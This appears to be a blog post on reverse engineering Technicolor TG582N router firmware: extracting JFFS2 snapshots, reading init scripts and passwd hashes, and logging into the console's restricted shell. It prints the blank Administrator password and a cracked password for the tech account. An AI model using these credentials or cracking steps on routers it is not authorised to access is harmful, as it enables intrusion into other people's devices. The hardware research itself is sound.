	BOOTID=$(sed -n "s/.*btab_bootid=\([0-9]\+\).*/\1/p" /proc/cmdline)

	# If BOOTID is empty, set it to a certain value (single-bank case)
	[ -z "$BOOTID" ] && BOOTID=999

	CONFDIR="/userfs/config-bank-$BOOTID"

	# Create a config directory for the booted bank if it does not yet exist
	[ ! -d $CONFDIR ] && mkdir $CONFDIR
	# Set /rw correctly: since /rw is on rootfs which is read-only, we
	# cannot use a symlink. However, mount supports the bind option which
	# essentially does the same.
	mount -o bind $CONFDIR /rw
	# If there are any files/directories in /userfs (config-bank-X
	# directories excluding), move them to the config directory of the
	# booted bank. This indicates a first boot from BLI.
	for i in $(ls /userfs | grep -v "^config-bank-*" | grep -v "^common$"); do
		mv /userfs/$i $CONFDIR
	done
	# If the config directory is still empty, copy the configuration
	# from another bank to allow a 'correct' boot. This can happen when
	# you upgrade an rbi with the bootloader.
	# NOTE: there is no guarantee that this configuration will work, but
	# it's better to have something.
	if [ -z "$(ls $CONFDIR | grep -v "^version$" 2>/dev/null)" -a -x /usr/bin/copyconfig ]; then
		/usr/bin/copyconfig "lastboot" $BOOTID
	fi

	# Set the 'lastboot' symlink to the current configuration
	rm -f /userfs/config-bank-lastboot
	ln -sf $CONFDIR /userfs/config-bank-lastboot

	# Copy the version file from /etc to /userfs/config-bank-X
	if [ -f /etc/version ]; then
		cp /etc/version $CONFDIR
	else
		echo "Unknown" > $CONFDIR/version
	fi

	# Create a common userfs directory
	[ ! -d /userfs/common ] && mkdir /userfs/common

}


case $1 in
start)
	start
	;;
stop)
	;;
restart)
	;;
*)
	echo "Usage $0 [start|stop|restart]"
	exit 1
	;;
esac
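The key step in the script is how it picks the directory that gets bind-mounted on /rw. The sketch below mirrors that logic in Python as an illustration: it looks for `btab_bootid=` on the kernel command line and falls back to 999 when it is missing, as the script does. The function name is hypothetical, and the command line used in the example is the one from the boot log.

```python
import re


def booted_config_dir(cmdline: str) -> str:
    """Mimic the BOOTID/CONFDIR logic of jffs2contentcheck."""
    # The script's sed expression is greedy, so the last occurrence wins.
    matches = re.findall(r"btab_bootid=([0-9]+)", cmdline)
    boot_id = matches[-1] if matches else "999"  # single-bank fallback
    return f"/userfs/config-bank-{boot_id}"


if __name__ == "__main__":
    cmdline = ("root=31:0 ro noinitrd memsize=0x3EDD000 "
               "console=ttyS0,115200 root=/dev/mtdblock2 rootfstype=squashfs")
    print(booted_config_dir(cmdline))
```

Since this device's command line carries no `btab_bootid`, the sketch yields `/userfs/config-bank-999`, which is the directory we should expect to find in the writable partition.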

What's JFFS2 filesystem?

JFFS2 (Journaled Flash File System v2) is a file system designed for use on Flash devices such as those commonly found in embedded systems. Unlike some other file systems which may be stored on the Flash device and then copied into RAM during boot (i.e. ramdisk) JFFS2 actually resides on the Flash device and allows the user to read/write data to Flash. This is particularly useful in embedded devices that wish to save some persistent data between reboots. [cit]

We finally found where the persistent information is saved. Going back to the binwalk analysis, I remember many signatures related to the JFFS2 filesystem. Let's review the extracted evidence:

[email protected]:~/Projects/tg582n/_dump.bin.extracted# tree jff*
jffs2-root
└── fs_1
    ├── common
    │   └── flash_image_fii
    ├── config-bank-999
    │   ├── dl
    │   │   ├── persistent.cnf
    │   │   ├── phy.conf
    │   │   ├── seed.dat
    │   │   ├── stsZWEADQ8.CM0.upg
    │   │   ├── tls
    │   │   │   ├── cert0001.pem
    │   │   │   └── pkey0001.pem
    │   │   ├── user.ini
    │   │   └── xdsl.inf
    │   ├── etc
    │   │   ├── group
    │   │   ├── gshadow
    │   │   ├── passwd
    │   │   ├── resolv.conf
    │   │   ├── secrets.tdb
    │   │   ├── shadow
    │   │   ├── smb.conf
    │   │   └── smbpasswd
    │   └── version
    └── config-bank-lastboot -> /userfs/config-bank-999
jffs2-root-0
└── fs_1
    ├── common
    │   └── flash_image_fii
    ├── config-bank-999
    │   ├── dl
    │   │   ├── persistent.cnf
    │   │   ├── phy.conf
    │   │   ├── seed.dat
    │   │   ├── stsZWEADQ8.CM0.upg
    │   │   ├── tls
    │   │   │   ├── cert0001.pem
    │   │   │   └── pkey0001.pem
    │   │   ├── user.ini
    │   │   └── xdsl.inf
    │   ├── etc
    │   │   ├── group
    │   │   ├── gshadow
    │   │   ├── passwd
    │   │   ├── resolv.conf
    │   │   ├── secrets.tdb
    │   │   ├── shadow
    │   │   ├── smb.conf
    │   │   └── smbpasswd
    │   └── version
    └── config-bank-lastboot -> /userfs/config-bank-999
jffs2-root-1
└── fs_1
    ├── config-bank-lastboot -> /userfs/config-bank-999
    ├── group
    ├── passwd
    ├── persistent.cnf
    ├── phy.conf
    ├── secrets.tdb
    ├── smb.conf
    ├── smbpasswd
    ├── stsZWEADQ8.CM0.upg
    ├── user.ini
    └── xdsl.inf
jffs2-root-10
└── fs_1
    ├── config-bank-lastboot -> /userfs/config-bank-999
    ├── group
    ├── passwd
    ├── persistent.cnf
    ├── smbpasswd
    └── user.ini
jffs2-root-11
└── fs_1
    ├── config-bank-lastboot -> /userfs/config-bank-999
    ├── group
    ├── passwd
    ├── persistent.cnf
    ├── smbpasswd
    └── user.ini
jffs2-root-12
└── fs_1
    ├── config-bank-lastboot -> /userfs/config-bank-999
    ├── group
    ├── passwd
    ├── persistent.cnf
    ├── smbpasswd
    └── user.ini
jffs2-root-13
└── fs_1
    ├── config-bank-lastboot -> /userfs/config-bank-999
    ├── group
    ├── passwd
    ├── persistent.cnf
    ├── smbpasswd
    └── user.ini
jffs2-root-14
└── fs_1
    ├── config-bank-lastboot -> /userfs/config-bank-999
    ├── group
    ├── passwd
    ├── persistent.cnf
    ├── smbpasswd
    └── user.ini
jffs2-root-15
└── fs_1
    ├── config-bank-lastboot -> /userfs/config-bank-999
    ├── group
    ├── passwd
    ├── persistent.cnf
    ├── smbpasswd
    └── user.ini
jffs2-root-16
└── fs_1
    ├── config-bank-lastboot -> /userfs/config-bank-999
    ├── group
    ├── passwd
    ├── persistent.cnf
    ├── smbpasswd
    └── user.ini
jffs2-root-17
└── fs_1
    ├── config-bank-lastboot -> /userfs/config-bank-999
    ├── group
    ├── passwd
    ├── persistent.cnf
    ├── smbpasswd
    └── user.ini
jffs2-root-18
└── fs_1
    ├── config-bank-lastboot -> /userfs/config-bank-999
    ├── group
    ├── passwd
    ├── persistent.cnf
    ├── smbpasswd
    └── user.ini
jffs2-root-19
└── fs_1
    ├── config-bank-lastboot -> /userfs/config-bank-999
    ├── group
    ├── passwd
    ├── persistent.cnf
    ├── smbpasswd
    └── user.ini
jffs2-root-2
└── fs_1
    ├── config-bank-lastboot -> /userfs/config-bank-999
    ├── group
    ├── passwd
    ├── persistent.cnf
    ├── secrets.tdb
    ├── smb.conf
    ├── smbpasswd
    ├── stsZWEADQ8.CM0.upg
    ├── user.ini
    └── xdsl.inf
jffs2-root-20
└── fs_1
    ├── config-bank-lastboot -> /userfs/config-bank-999
    ├── group
    ├── passwd
    ├── persistent.cnf
    ├── smbpasswd
    └── user.ini
jffs2-root-21
└── fs_1
    ├── config-bank-lastboot -> /userfs/config-bank-999
    ├── group
    ├── passwd
    ├── persistent.cnf
    ├── smbpasswd
    └── user.ini
jffs2-root-22
└── fs_1
    ├── config-bank-lastboot -> /userfs/config-bank-999
    ├── group
    ├── passwd
    ├── persistent.cnf
    ├── smbpasswd
    └── user.ini
jffs2-root-23
└── fs_1
    ├── config-bank-lastboot -> /userfs/config-bank-999
    ├── group
    ├── passwd
    ├── persistent.cnf
    ├── smbpasswd
    └── user.ini
jffs2-root-24
└── fs_1
    ├── config-bank-lastboot -> /userfs/config-bank-999
    ├── group
    ├── passwd
    └── smbpasswd
jffs2-root-25
└── fs_1
    ├── config-bank-lastboot -> /userfs/config-bank-999
    ├── group
    ├── passwd
    └── smbpasswd
jffs2-root-26
└── fs_1
    ├── config-bank-lastboot -> /userfs/config-bank-999
    ├── group
    ├── passwd
    └── smbpasswd
jffs2-root-27
└── fs_1
    ├── passwd
    └── smbpasswd
jffs2-root-28
└── fs_1
    ├── passwd
    └── smbpasswd
jffs2-root-29
└── fs_1
    └── smbpasswd
jffs2-root-3
└── fs_1
    ├── config-bank-lastboot -> /userfs/config-bank-999
    ├── group
    ├── passwd
    ├── persistent.cnf
    ├── secrets.tdb
    ├── smb.conf
    ├── smbpasswd
    ├── user.ini
    └── xdsl.inf
jffs2-root-4
└── fs_1
    ├── config-bank-lastboot -> /userfs/config-bank-999
    ├── group
    ├── passwd
    ├── persistent.cnf
    ├── secrets.tdb
    ├── smbpasswd
    ├── user.ini
    └── xdsl.inf
jffs2-root-5
└── fs_1
    ├── config-bank-lastboot -> /userfs/config-bank-999
    ├── group
    ├── passwd
    ├── persistent.cnf
    ├── smbpasswd
    ├── user.ini
    └── xdsl.inf
jffs2-root-6
└── fs_1
    ├── config-bank-lastboot -> /userfs/config-bank-999
    ├── group
    ├── passwd
    ├── persistent.cnf
    ├── smbpasswd
    ├── user.ini
    └── xdsl.inf
jffs2-root-7
└── fs_1
    ├── config-bank-lastboot -> /userfs/config-bank-999
    ├── group
    ├── passwd
    ├── persistent.cnf
    β”œβ”€β”€ smbpasswd
    β”œβ”€β”€ user.ini
    └── xdsl.inf
jffs2-root-8
└── fs_1
    β”œβ”€β”€ config-bank-lastboot -> /userfs/config-bank-999
    β”œβ”€β”€ group
    β”œβ”€β”€ passwd
    β”œβ”€β”€ persistent.cnf
    β”œβ”€β”€ smbpasswd
    └── user.ini
jffs2-root-9
└── fs_1
    β”œβ”€β”€ config-bank-lastboot -> /userfs/config-bank-999
    β”œβ”€β”€ group
    β”œβ”€β”€ passwd
    β”œβ”€β”€ persistent.cnf
    β”œβ”€β”€ smbpasswd
    └── user.ini

41 directories, 210 files

Honestly, I don't know why there are so many copies of the same files, but we definitely found what we were looking for: not only the passwd file but also certificates with private keys, user configurations, xDSL line configurations, etc.

Let's check whether the files inside those directories differ from one another, so we can narrow our analysis. With some basic bash scripting, we can use md5sum to find out which files are identical. It turns out that almost every file is an exact copy and the only one that varies is user.ini. Also, the .upg file has the same digest as smbpasswd: d41d8cd98f00b204e9800998ecf8427e is the MD5 of empty input, so both files are simply empty.

group b6645876780362adfefe6ae7aa2aa970
passwd ccfbeda0bfe6a969d9f3e95284e450be
persistent.cnf 0169902625104a21be24f44df679d610
phy.conf c176b13932e5bf01930a066491877986
secrets.tdb cbe77f45cae8dad41cb9bef73ed69ed6
smb.conf 7c6ed2fab7571c3441d3af6740f9d067
smbpasswd d41d8cd98f00b204e9800998ecf8427e
stsZWEADQ8.CM0.upg d41d8cd98f00b204e9800998ecf8427e
user.ini 080b575f72aa410d0d2606ed9f152c18
user.ini 1b37b14685d303d192c80e5e8c3e68c7
user.ini 1d57ab52d6fa5d4d61cf6f520ac62b29
user.ini 2113deb10fd3cc6e5e5d5fc44489ee13
user.ini 2fbe85cc5305473ad68ae9b842134696
user.ini 3a4860416befea32f5a6952f75c1073e
user.ini 4388cd21843a0e1dbc7ec8b9d6b0fe81
user.ini 59499065a1243c0fd0bc3aec77eb5052
user.ini 6281deec4ac9389b797afc4873b9a90a
user.ini 6400c4bc913e682e32e055d262c058d4
user.ini 8165fea871781c7320bd6ef3b201c90f
user.ini 8504dfd01106e4f2e2a21c6e7460964e
user.ini 919573ff12d4eabf968a6dfd97a7d616
user.ini c4f70675bc732dd93fc8bb9c9219fb74
user.ini cab37a7859e4cb319aa1684f9fbee277
user.ini e9930518fb8db6670f14af642e177083
xdsl.inf 25daad3d9e60b45043a70c4ab7d3b1c6
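The comparison above can also be sketched in Python instead of bash. This is only a minimal sketch, not the script I actually ran: the function names are made up for illustration, and it assumes the extracted jffs2-root-* directories all sit under one root directory that you pass in.

```python
import hashlib
from collections import defaultdict
from pathlib import Path

# MD5 of zero bytes of input; any file with this digest is empty.
EMPTY_MD5 = hashlib.md5(b"").hexdigest()


def digests_by_name(root):
    """Map each file name found under root to the set of MD5 digests seen for it."""
    seen = defaultdict(set)
    for path in Path(root).rglob("*"):
        # Skip directories and symlinks such as config-bank-lastboot,
        # whose target only exists on the router itself.
        if path.is_symlink() or not path.is_file():
            continue
        seen[path.name].add(hashlib.md5(path.read_bytes()).hexdigest())
    return dict(seen)


def report(root):
    """Return 'name digest' lines, one per distinct (name, digest) pair."""
    lines = []
    for name, digests in sorted(digests_by_name(root).items()):
        for digest in sorted(digests):
            note = " (empty file)" if digest == EMPTY_MD5 else ""
            lines.append(f"{name} {digest}{note}")
    return lines
```

A file name that appears on a single line of the report is identical in every snapshot; a name that appears on several lines (user.ini here) is the one worth diffing.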

Let's analyze them:

group: a standard file, the same one you can find on any *nix system, but with some interesting groups.

SuperUser::101:
TechnicalSupport::102:
Administrator::103:
WebsevUser::104:
LAN_Admin::105:
PowerUser::106:
User::107:
WAN_Admin::108:

passwd: the file we were looking for. It must be slightly modified during boot, because root access is somehow disabled on the running system, but at least we found two users, Administrator and tech, each with its password hash.

root::0:0:Super User:/:/bin/sh
nobody:*:1:1:nobody:/:/bin/sh
mvfs:*:499:1::/var/mvfs:/bin/sh
Administrator:ANpAYtow5vx0U:500:103:Linux User:(null):/bin/sh
tech:RB6zAiLmCT4zM:501:102:Linux User:(null):/bin/sh
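To read these entries more easily, here is a small sketch that splits each line into the seven standard passwd fields and roughly classifies the password field. The helper names are mine, and treating any 13-character field as a traditional DES crypt hash is a heuristic assumption, not something the firmware states.

```python
from typing import NamedTuple

# The five entries exactly as they appear in the extracted passwd file.
PASSWD = """\
root::0:0:Super User:/:/bin/sh
nobody:*:1:1:nobody:/:/bin/sh
mvfs:*:499:1::/var/mvfs:/bin/sh
Administrator:ANpAYtow5vx0U:500:103:Linux User:(null):/bin/sh
tech:RB6zAiLmCT4zM:501:102:Linux User:(null):/bin/sh
"""


class Account(NamedTuple):
    name: str
    password: str
    uid: int
    gid: int
    gecos: str
    home: str
    shell: str


def parse_passwd(text):
    """Parse lines of the form name:password:uid:gid:gecos:home:shell."""
    accounts = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        name, password, uid, gid, gecos, home, shell = line.split(":")
        accounts.append(Account(name, password, int(uid), int(gid), gecos, home, shell))
    return accounts


def password_kind(field):
    """Roughly classify a password field (heuristic, see the note above)."""
    if field == "":
        return "empty"      # no password required
    if field.startswith(("*", "!")):
        return "locked"     # no hash can ever match
    if len(field) == 13:
        return "des-crypt"  # 2-character salt + 11-character digest
    return "other"


for account in parse_passwd(PASSWD):
    print(account.name, account.uid, account.gid, password_kind(account.password))
```

The group IDs line up with the group file: Administrator is in group 103 (Administrator) and tech in group 102 (TechnicalSupport).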

If you search on Google, it turns out that the hash ANpAYtow5vx0U was generated by the mkpasswd command, and here we can read that:

If your password is on this list, it is not secure. It was generated by using the program 'mkpasswd' and then not typing anything. It turns out that 'mkpasswd' doesn't make passwords, it makes password hashes. If you enter a blank password, it generates one of 4096 possible passwords.
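The figure of 4096 comes from the salt: a traditional DES crypt string is 13 characters long, and its first two characters are a salt drawn from a 64-character alphabet. A minimal sketch of that arithmetic follows; the helper names are hypothetical. It does not recompute any hash, since Python's crypt module is deprecated and was removed in Python 3.13.

```python
import string

# The 64 characters traditional crypt(3) uses for salts and digests.
CRYPT_ALPHABET = "./" + string.digits + string.ascii_uppercase + string.ascii_lowercase


def split_des_crypt(hash_text):
    """Split a 13-character DES crypt string into (salt, digest)."""
    if len(hash_text) != 13 or any(c not in CRYPT_ALPHABET for c in hash_text):
        raise ValueError("not a traditional DES crypt string")
    return hash_text[:2], hash_text[2:]


def possible_salts():
    """Number of distinct two-character salts."""
    return len(CRYPT_ALPHABET) ** 2


print(possible_salts())                  # 4096
print(split_des_crypt("ANpAYtow5vx0U"))  # ('AN', 'pAYtow5vx0U')
print(split_des_crypt("RB6zAiLmCT4zM"))  # ('RB', '6zAiLmCT4zM')
```

With only 4096 salts, a blank password can only ever hash to one of 4096 strings, which is why a complete lookup list of them is practical.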

So the Administrator user has a simple blank password. I didn't find anything similar for the hash of the tech user, so I started a simple cracking session with john. Without any fancy cracking rig or powerful graphics card, and after an affordable cracking time (about 2 days), I managed to crack the password: it appears to be 55058391.

[Image: Reverse engineering the router Technicolor TG582N]

secrets.tdb: related to the Samba services, where it stores passwords in clear text. The file can be opened with tdbdump; in this dump it only holds the domain SID and a random seed:

{
key(23) = "SECRETS/SID/TECHNICOLOR"
data(68) = "\01\04\00\00\00\00\00\05\00\00\00\15\89+\B5\E1jD\15P\1A\92\F03\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00"
}
{
key(17) = "INFO/random_seed\00"
data(4) = "y\04\00\00"
}
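The 68-byte SID record can be turned into the usual S-1-... notation. The sketch below rests on two assumptions of mine: that tdbdump escapes every non-printable byte as a backslash followed by two hex digits, and that the record is a raw SID structure (revision, sub-authority count, 6-byte authority, 15 32-bit sub-authorities) stored in big-endian order, which the leading \00\00\00\15 (21) suggests. The function names are made up for illustration.

```python
import re
import struct

# The data(68) value from the dump: 24 significant bytes, then 44 zero bytes.
DATA = r"\01\04\00\00\00\00\00\05\00\00\00\15\89+\B5\E1jD\15P\1A\92\F03" + r"\00" * 44


def tdb_unescape(text):
    """Turn \\XX hex escapes back into raw bytes (assumed tdbdump escaping)."""
    unescaped = re.sub(
        r"\\([0-9A-Fa-f]{2})",
        lambda match: chr(int(match.group(1), 16)),
        text,
    )
    return unescaped.encode("latin-1")


def decode_sid(raw, byteorder=">"):
    """Decode a 68-byte SID record; byteorder applies to the sub-authorities."""
    revision, count, authority, *subs = struct.unpack(f"{byteorder}BB6s15I", raw)
    # The 6-byte identifier authority is always read as a big-endian integer.
    parts = [str(revision), str(int.from_bytes(authority, "big"))]
    parts += [str(value) for value in subs[:count]]
    return "S-" + "-".join(parts)


raw = tdb_unescape(DATA)
print(len(raw), decode_sid(raw))
```

Under those assumptions the record decodes to S-1-5-21-2301343201-1782846800-445837363, a typical locally generated domain SID (the S-1-5-21 prefix followed by three random values).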

user.ini: the router's clear-text configuration file.

There are some other files but, for now, we have enough to start.

Accessing the device...in some way

We found that the Administrator user has a blank password, so we can now log in via console access. Access for the tech user is somehow disabled.

Username : Administrator
Password : 
------------------------------------------------------------------------

                             ______  Technicolor TG582n
                         ___/_____/\ 
                        /         /\\  8.C.M.0
                  _____/__       /  \\ 
                _/       /\_____/___ \  Copyright (c) 1999-2012, Technicolor
               //       /  \       /\ \
       _______//_______/    \     / _\/______ 
      /      / \       \    /    / /        /\
   __/      /   \       \  /    / /        / _\__ 
  / /      /     \_______\/    / /        / /   /\
 /_/______/___________________/ /________/ /___/  \ 
 \ \      \    ___________    \ \        \ \   \  /
  \_\      \  /          /\    \ \        \ \___\/
     \      \/          /  \    \ \        \  /
      \_____/          /    \    \ \________\/
           /__________/      \    \  /
           \   _____  \      /_____\/
            \ /    /\  \    /___\/    F.D.C. FW 14
             /____/  \  \  /
             \    \  /___\/
              \____\/

------------------------------------------------------------------------
{Administrator}=>
contentsharing          firewall                printersharing          
pwr                     service                 connection              
cwmp                    dhcp                    dns                     
download                dsd                     dyndns                  
eth                     atm                     config                  
debug                   env                     expr                    
grp                     hostmgr                 ids                    
igmp                    interface               ip                      
ipqos                   label                   language                
mbus                    memm                    mlp                     
mobile                  nat                     ppp                     
pptp                    ptrace                  script                  
sntp                    software                statecheck              
syslog                  system                  tls          
{Administrator}=>

I spent a lot of time poking around in this weird restricted shell. I wasn't able to escape to our beloved Busybox, which I know is running underneath. No matter what I tried, I always ended up in this jail I could not escape. This shell seems to manage everything that is reachable from console access.

To confirm this theory, I found this old post:

[Image: Reverse engineering the router Technicolor TG582N]

And suddenly I remembered these two sneaky files lying in the /nmon directory.

[Image: Reverse engineering the router Technicolor TG582N]

I'm quite sure this program is run at boot time and, basically, takes control of the entire router. This can be confirmed from the boot log shown earlier:

linux application start ...
wait for linux_appl to initialize (1)
wait for linux_appl to initialize (2)
************* ERROR RECORD *************
000000:00:00.000000
Application NMON started after POWERON.
****************** END *****************
wait for linux_appl to initialize (3)
appl_init: BUILD VERIFIED!
wait for linux_appl to initialize (4)
[SS EMUL] ERR: opening config file /active/ss.conf failed
End of initialisation
wait for linux_appl to initialize (5)

And this is the script that runs linux_appl.exe at boot time:

#
#/etc/init.d/linuxappl
#
#!/bin/sh

. /etc/init.d/mbusd_util

case $1 in
    start)
        TELLER=0
        # linux application configuration
        /bin/echo "linux application start ..."
        rm -f /var/run/linux_appl
        rm -f /var/run/init_finished
        mbusd_set_loadapp
        ../../nmon/linux_appl.exe /dev/nmon/nmontrace /dev/nmon/nmonerr /archive/ &
        while [ ! -f /var/run/linux_appl ]
        do
           TELLER=`expr ${TELLER} + 1`
           echo "wait for linux_appl to initialize (${TELLER})"
           sleep 1;
        done
        ;;
    stop)
        killall -9 linux_appl
        ;;
    *)

esac
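The start branch is a plain polling loop: it launches linux_appl.exe in the background and then checks once per second for the flag file /var/run/linux_appl, printing the "wait for linux_appl to initialize" lines seen in the boot log. As written it has no timeout, so boot would presumably block forever if the flag file never appeared. Here is a minimal Python sketch of the same pattern with an upper bound added; the function and its parameters are my own illustration, not something found on the device.

```python
import os
import time


def wait_for_flag(path, timeout=30.0, interval=1.0, sleep=time.sleep):
    """Poll until path exists.

    Returns the number of polls that were needed, or None if the
    timeout expired first (the original script would loop forever).
    """
    polls = 0
    deadline = time.monotonic() + timeout
    while not os.path.exists(path):
        if time.monotonic() >= deadline:
            return None
        polls += 1
        print(f"wait for linux_appl to initialize ({polls})")
        sleep(interval)
    return polls
```

In the boot log the counter reaches 5, which suggests linux_appl.exe needed at least five seconds to create its flag file on this boot.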

Next steps

This ends this phase of my journey. Honestly, I was (and am) not prepared to run into such a restricted and peculiar environment. My next steps will be to look at the router from a network point of view, analyzing it while it's up and running and trying to find information within the services it runs and offers.

I hope you will find this post useful and if you have any hints or ideas to help me, please drop me a note.
